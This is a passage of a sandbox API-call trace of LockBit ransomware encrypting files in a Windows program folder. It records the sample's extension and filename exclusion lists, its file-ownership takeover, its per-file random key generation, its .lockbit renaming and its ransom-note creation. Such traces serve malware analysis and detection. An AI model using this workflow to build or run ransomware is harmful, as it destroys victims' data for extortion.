(_Block=0x77d800) [0082.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.881] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.881] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.881] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70399b5a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70399b5a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4de61a87, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x95bac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scene_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0082.881] lstrcmpiW (lpString1=".", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.881] lstrcmpiW (lpString1="..", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.881] PathFindExtensionW (pszPath="Scene_loop_PAL.wmv") returned=".wmv" [0082.881] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.881] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.882] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.882] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.883] lstrcmpiW (lpString1="ntldr", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.884] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.884] lstrcmpiW (lpString1="autorun.inf", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.884] lstrcmpiW (lpString1="thumbs.db", lpString2="Scene_loop_PAL.wmv") returned 1 [0082.884] lstrcmpiW (lpString1="iconcache.db", lpString2="Scene_loop_PAL.wmv") returned -1 [0082.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv") returned=".wmv" [0082.884] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.884] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.884] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.885] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.885] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv.lockbit") returned 83 [0082.885] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.886] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.886] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.886] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.887] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.887] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.887] RtlFreeAnsiString (AnsiString="\\") [0082.887] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0082.887] malloc (_Size=0x200) returned 0x77d800 [0082.887] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.887] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.887] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.887] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.888] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.888] CloseHandle (hObject=0x3c0) returned 1 [0082.888] free (_Block=0x77d800) [0082.889] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.889] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.889] malloc (_Size=0x40068) returned 0x2031ed0 [0082.890] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=613292) returned 1 [0082.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0082.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0082.892] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.896] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.896] malloc (_Size=0xbc) returned 0x77d800 [0082.896] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0082.897] free (_Block=0x77d800) [0082.897] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.897] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.897] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.897] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x0, dwReserved1=0x0, cFileName="TitleButtonIcon.png", cAlternateFileName="")) returned 1 [0082.897] lstrcmpiW (lpString1=".", lpString2="TitleButtonIcon.png") returned -1 [0082.897] lstrcmpiW (lpString1="..", lpString2="TitleButtonIcon.png") returned -1 [0082.897] PathFindExtensionW (pszPath="TitleButtonIcon.png") returned=".png" [0082.897] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.897] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.897] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.897] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.898] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.898] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.898] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.898] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.899] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.899] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.900] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="ntldr", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="bootsect.bak", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="autorun.inf", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="thumbs.db", lpString2="TitleButtonIcon.png") returned -1 [0082.900] lstrcmpiW (lpString1="iconcache.db", lpString2="TitleButtonIcon.png") returned -1 [0082.900] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.900] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned=".png" [0082.900] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.900] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.900] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.900] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.901] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.901] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.901] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png.lockbit") returned 84 [0082.901] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.911] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.912] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.912] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.912] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.912] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.912] RtlFreeAnsiString (AnsiString="\\") [0082.912] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0082.912] malloc (_Size=0x200) returned 0x77d800 [0082.912] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.912] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.912] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.912] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.913] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.914] CloseHandle (hObject=0x3b4) returned 1 [0082.914] free (_Block=0x77d800) [0082.914] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0082.914] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.914] malloc (_Size=0x40068) returned 0x3d70048 [0082.915] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=153) returned 1 [0082.915] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.916] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.917] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.917] malloc (_Size=0xbe) returned 0x77d800 [0082.917] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0082.918] free (_Block=0x77d800) [0082.918] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.918] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.918] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.918] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x0, dwReserved1=0x0, cFileName="TitleButtonSubpicture.png", cAlternateFileName="")) returned 1 [0082.918] lstrcmpiW (lpString1=".", lpString2="TitleButtonSubpicture.png") returned -1 [0082.918] lstrcmpiW (lpString1="..", lpString2="TitleButtonSubpicture.png") returned -1 [0082.919] PathFindExtensionW 